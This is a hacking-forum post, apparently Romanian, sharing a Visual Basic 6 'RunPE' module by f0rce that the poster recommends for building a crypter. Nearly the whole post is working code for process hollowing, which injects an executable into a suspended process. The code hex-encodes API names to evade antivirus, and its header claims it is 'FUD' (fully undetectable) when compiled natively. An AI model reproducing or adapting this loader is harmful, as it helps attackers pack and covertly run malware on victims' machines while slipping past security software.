Jump to content
Nytro

[FUD] New RunPE

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

Pentru incarcarea unui executabil in memorie, pentru cei care vor sa faca un crypter.

Author: f0rce

Creditele (pe ce este bazata munca sa) sunt in fisierul clasa (.cls) pentru Visual Basic 6 (sa inteleaga toata lumea).

Ar trebui sa functioneze pe XP, Vista, Windows 7, daca am timp o sa il testez.

'---------------------------------------------------------------------------------------
' Module      : cRunPE
' DateTime    : 14/06/2010
' Author      : f0rce
' Purpose     : RunPE
' Usage       : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
'               applications, but you may not reproduce
'               or publish this code on any web site,
'               online service, or distribute as source
'               on any media without express permission.
'
' Thanks to   : SqUeEzEr  - NTLoadLibrary & NTGetProcAddress
'               Cobein    - Normal RunPE structure
'               Karcrack  - Invoke
'
' Compile     : It work with all Compile Options but Compile with Native it will be FUD
'
' History     : 14/06/2010 First Cut....................................................
'---------------------------------------------------------------------------------------

Option Explicit

Private Const THUNK_APICALL             As String = "384234433234303835313C5041544348313E45383C5041544348323E3539383930313636333143304333" '"8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3"
Private Const PATCH1                    As String = "3C5041544348313E" '"<PATCH1>"
Private Const PATCH2                    As String = "3C5041544348323E" '"<PATCH2>"

Private Declare Function LdrLoadDll Lib "NTDLL" (ByVal pWPathToFile As Long, ByVal Flags As Long, ByRef pwModuleFileName As UNICODE_STRING, ByRef ModuleHandle As Long) As Long
Private Declare Sub MoveMe Lib "MSVBVM60" Alias "__vbaCopyBytes" (ByVal Size As Long, Dest As Any, Source As Any)
Private Declare Sub RtlInitUnicodeString Lib "NTDLL" (DestinationString As Any, ByVal SourceString As Long)
Private Declare Function LdrGetProcedureAddress Lib "NTDLL" (ByVal ModuleHandle As Long, ByRef paFunctionName As Long, ByVal Ordinal As Integer, ByRef FunctionAddress As Long) As Long

Private c_bInit                         As Boolean
Private c_lVTE                          As Long
Private c_lOldVTE                       As Long
Private c_bvASM(&HFF)                   As Byte

Private Const CONTEXT_FULL              As Long = &H10007
Private Const MAX_PATH                  As Integer = 260
Private Const CREATE_SUSPENDED          As Long = &H4
Private Const MEM_COMMIT                As Long = &H1000
Private Const MEM_RESERVE               As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE    As Long = &H40

Private Const sKlib                     As String = "4B65726E656C3332" 'Kernel32
Private Const sNlib                     As String = "4E74646C6C" 'Ntdll
Private Const sCApi                     As String = "43726561746550726F6365737357" 'CreateProcessW
Private Const sNApi                     As String = "4E74556E6D6170566965774F6653656374696F6E" 'NtUnmapViewOfSection
Private Const sRtApi                    As String = "52746C4D6F76654D656D6F7279" 'RtlMoveMemory
Private Const sVApi                     As String = "5669727475616C416C6C6F634578" 'VirtualAllocEx
Private Const sWApi                     As String = "577269746550726F636573734D656D6F7279" 'WriteProcessMemory
Private Const sGApi                     As String = "476574546872656164436F6E74657874" 'GetThreadContext
Private Const sSApi                     As String = "536574546872656164436F6E74657874" 'SetThreadContext
Private Const sRApi                     As String = "526573756D65546872656164" 'ResumeThread

Private Type UNICODE_STRING
    uLength                             As Integer
    uMaximumLength                      As Integer
    pBuffer                             As Long
End Type

Private Type STARTUPINFO
    cb                                  As Long
    lpReserved                          As Long
    lpDesktop                           As Long
    lpTitle                             As Long
    dwX                                 As Long
    dwY                                 As Long
    dwXSize                             As Long
    dwYSize                             As Long
    dwXCountChars                       As Long
    dwYCountChars                       As Long
    dwFillAttribute                     As Long
    dwFlags                             As Long
    wShowWindow                         As Integer
    cbReserved2                         As Integer
    lpReserved2                         As Long
    hStdInput                           As Long
    hStdOutput                          As Long
    hStdError                           As Long
End Type

Private Type PROCESS_INFORMATION
    hProcess                            As Long
    hThread                             As Long
    dwProcessID                         As Long
    dwThreadID                          As Long
End Type

Private Type FLOATING_SAVE_AREA
    ControlWord                         As Long
    StatusWord                          As Long
    TagWord                             As Long
    ErrorOffset                         As Long
    ErrorSelector                       As Long
    DataOffset                          As Long
    DataSelector                        As Long
    RegisterArea(1 To 80)               As Byte
    Cr0NpxState                         As Long
End Type

Private Type CONTEXT
    ContextFlags                        As Long
    Dr0                                 As Long
    Dr1                                 As Long
    Dr2                                 As Long
    Dr3                                 As Long
    Dr6                                 As Long
    Dr7                                 As Long
    FloatSave                           As FLOATING_SAVE_AREA
    SegGs                               As Long
    SegFs                               As Long
    SegEs                               As Long
    SegDs                               As Long
    Edi                                 As Long
    Esi                                 As Long
    Ebx                                 As Long
    Edx                                 As Long
    Ecx                                 As Long
    Eax                                 As Long
    Ebp                                 As Long
    Eip                                 As Long
    SegCs                               As Long
    EFlags                              As Long
    Esp                                 As Long
    SegSs                               As Long
End Type

Private Type IMAGE_DOS_HEADER
    e_magic                             As Integer
    e_cblp                              As Integer
    e_cp                                As Integer
    e_crlc                              As Integer
    e_cparhdr                           As Integer
    e_minalloc                          As Integer
    e_maxalloc                          As Integer
    e_ss                                As Integer
    e_sp                                As Integer
    e_csum                              As Integer
    e_ip                                As Integer
    e_cs                                As Integer
    e_lfarlc                            As Integer
    e_ovno                              As Integer
    e_res(0 To 3)                       As Integer
    e_oemid                             As Integer
    e_oeminfo                           As Integer
    e_res2(0 To 9)                      As Integer
    e_lfanew                            As Long
End Type

Private Type IMAGE_FILE_HEADER
    Machine                             As Integer
    NumberOfSections                    As Integer
    TimeDateStamp                       As Long
    PointerToSymbolTable                As Long
    NumberOfSymbols                     As Long
    SizeOfOptionalHeader                As Integer
    Characteristics                     As Integer
End Type

Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress                      As Long
    Size                                As Long
End Type

Private Type IMAGE_OPTIONAL_HEADER
    Magic                               As Integer
    MajorLinkerVersion                  As Byte
    MinorLinkerVersion                  As Byte
    SizeOfCode                          As Long
    SizeOfInitializedData               As Long
    SizeOfUnitializedData               As Long
    AddressOfEntryPoint                 As Long
    BaseOfCode                          As Long
    BaseOfData                          As Long
    ImageBase                           As Long
    SectionAlignment                    As Long
    FileAlignment                       As Long
    MajorOperatingSystemVersion         As Integer
    MinorOperatingSystemVersion         As Integer
    MajorImageVersion                   As Integer
    MinorImageVersion                   As Integer
    MajorSubsystemVersion               As Integer
    MinorSubsystemVersion               As Integer
    W32VersionValue                     As Long
    SizeOfImage                         As Long
    SizeOfHeaders                       As Long
    CheckSum                            As Long
    SubSystem                           As Integer
    DllCharacteristics                  As Integer
    SizeOfStackReserve                  As Long
    SizeOfStackCommit                   As Long
    SizeOfHeapReserve                   As Long
    SizeOfHeapCommit                    As Long
    LoaderFlags                         As Long
    NumberOfRvaAndSizes                 As Long
    DataDirectory(0 To 15)              As IMAGE_DATA_DIRECTORY
End Type

Private Type IMAGE_NT_HEADERS
    Signature                           As Long
    FileHeader                          As IMAGE_FILE_HEADER
    OptionalHeader                      As IMAGE_OPTIONAL_HEADER
End Type

Private Type IMAGE_EXPORT_DIRECTORY
   Characteristics                      As Long
   TimeDateStamp                        As Long
   MajorVersion                         As Integer
   MinorVersion                         As Integer
   lpName                               As Long
   Base                                 As Long
   NumberOfFunctions                    As Long
   NumberOfNames                        As Long
   lpAddressOfFunctions                 As Long
   lpAddressOfNames                     As Long
   lpAddressOfNameOrdinals              As Long
End Type

Private Type IMAGE_SECTION_HEADER
    SecName                             As String * 8
    VirtualSize                         As Long
    VirtualAddress                      As Long
    SizeOfRawData                       As Long
    PointerToRawData                    As Long
    PointerToRelocations                As Long
    PointerToLinenumbers                As Long
    NumberOfRelocations                 As Integer
    NumberOfLinenumbers                 As Integer
    Characteristics                     As Long
End Type

Public Function zDoNotCall() As Long
'    This function will be replaced with machine code laterz
'    Do not add any public procedure on top of it
End Function
Public Sub CallMe(szProcessName As String, lpBuffer() As Byte, sParameter As String)
Dim Pidh As IMAGE_DOS_HEADER
Dim Pinh As IMAGE_NT_HEADERS
Dim Pish As IMAGE_SECTION_HEADER
Dim Si As STARTUPINFO
Dim Pi As PROCESS_INFORMATION
Dim Ctx As CONTEXT
Dim i As Long
    Si.cb = Len(Si)
    Ctx.ContextFlags = CONTEXT_FULL
    Call Invoke(GetPointer("3"), VarPtr(Pidh), VarPtr(lpBuffer(0)), Len(Pidh))
    Call Invoke(GetPointer("3"), VarPtr(Pinh), VarPtr(lpBuffer(Pidh.e_lfanew)), Len(Pinh))
    Call Invoke(GetPointer("1"), 0, StrPtr(szProcessName) & " " & sParameter, 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(Si), VarPtr(Pi))
    Call Invoke(GetPointer("2"), Pi.hProcess, Pinh.OptionalHeader.ImageBase)
    Call Invoke(GetPointer("4"), Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
    Call Invoke(GetPointer("5"), Pi.hProcess, Pinh.OptionalHeader.ImageBase, VarPtr(lpBuffer(0)), Pinh.OptionalHeader.SizeOfHeaders, 0)
For i = 0 To Pinh.FileHeader.NumberOfSections - 1
    Call MoveMe(Len(Pish), Pish, lpBuffer(Pidh.e_lfanew + Len(Pinh) + Len(Pish) * i))
    Call Invoke(GetPointer("5"), Pi.hProcess, Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, VarPtr(lpBuffer(Pish.PointerToRawData)), Pish.SizeOfRawData, 0)
Next
    Call Invoke(GetPointer("6"), Pi.hThread, VarPtr(Ctx))
    Call Invoke(GetPointer("5"), Pi.hProcess, Ctx.Ebx + 8, VarPtr(Pinh.OptionalHeader.ImageBase), 4, 0)
    Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
    Call Invoke(GetPointer("7"), Pi.hThread, VarPtr(Ctx))
    Call Invoke(GetPointer("8"), Pi.hThread)
End Sub

Private Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long
    Dim lPtr        As Long
    Dim i           As Long
    Dim sData       As String
    Dim sParams     As String

    If lMod = 0 Then Exit Function

    For i = UBound(Params) To 0 Step -1
        sParams = sParams & Hex2Str("3638") & GetLong(CLng(Params(i)))
    Next

    lPtr = VarPtr(c_bvASM(0))
    lPtr = lPtr + (UBound(Params) + 2) * 5
    lPtr = lMod - lPtr - 5

    sData = Hex2Str(THUNK_APICALL)
    sData = Replace$(sData, Hex2Str(PATCH1), sParams)
    sData = Replace$(sData, Hex2Str(PATCH2), GetLong(lPtr))

    Call PutThunk(sData)

    Invoke = PatchCall
End Function

Private Function GetLong(ByVal lData As Long) As String
    Dim bvTemp(3)   As Byte
    Dim i           As Long

    Call MoveMe(&H4, bvTemp(0), lData)

    For i = 0 To 3
        GetLong = GetLong & Right$(Hex2Str("30") & Hex$(bvTemp(i)), 2)
    Next
End Function

Private Sub PutThunk(ByVal sThunk As String)
    Dim i   As Long
    For i = 0 To Len(sThunk) - 1 Step 2
        c_bvASM((i / 2)) = CByte(Hex2Str("2668") & Mid$(sThunk, i + 1, 2))
    Next
End Sub

Private Function PatchCall() As Long
    Call MoveMe(&H4, c_lVTE, ByVal ObjPtr(Me))
    c_lVTE = c_lVTE + &H1C
    Call MoveMe(&H4, c_lOldVTE, ByVal c_lVTE)
    Call MoveMe(&H4, ByVal c_lVTE, VarPtr(c_bvASM(0)))
    PatchCall = zDoNotCall
    Call MoveMe(&H4, ByVal c_lVTE, c_lOldVTE)
End Function

Public Property Get Initialized() As Boolean
    Initialized = c_bInit
End Property

Private Sub Class_Initialize()
    c_bInit = True
End Sub

Public Function Hex2Str(ByVal strData As String)
Dim i As Long, CryptString As String, tmpChar As String
    On Local Error Resume Next
    For i = 1 To Len(strData) Step 2
        CryptString = CryptString & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(strData, i, 2)))
    Next i
    Hex2Str = CryptString
End Function
Public Function GetPointer(PTR As String) As Long
GetPointer = 0
If PTR = "1" Then
GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sCApi))
Else
End If
If PTR = "2" Then
GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sNlib)), Hex2Str(sNApi))
Else
End If
If PTR = "3" Then
GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sRtApi))
Else
End If
If PTR = "4" Then
GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sVApi))
Else
End If
If PTR = "5" Then
GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sWApi))
Else
End If
If PTR = "6" Then
GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sGApi))
Else
End If
If PTR = "7" Then
GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sSApi))
Else
End If
If PTR = "8" Then
GetPointer = NtGetProcAddr(NtLoadLibrary(Hex2Str(sKlib)), Hex2Str(sRApi))
Else
End If
End Function
Public Function NtGetProcAddr(ByVal lModuleHandle As Long, ByVal sProc As String) As Long
    Dim i           As Long
    Dim ANSI()      As Byte
    ReDim ANSI(0 To Len(sProc))
    For i = 1 To Len(sProc)
        ANSI(i - 1) = Asc(Mid$(sProc, i, 1))
    Next i
    Call LdrGetProcedureAddress(lModuleHandle, VarPtr(ANSI(0)), ByVal 0&, NtGetProcAddr)
End Function
Public Function NtLoadLibrary(ByVal sName As String) As Long
    Dim US          As UNICODE_STRING
    Call RtlInitUnicodeString(US, StrPtr(sName))
    Call LdrLoadDll(ByVal 0&, ByVal 0&, US, NtLoadLibrary)
End Function

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...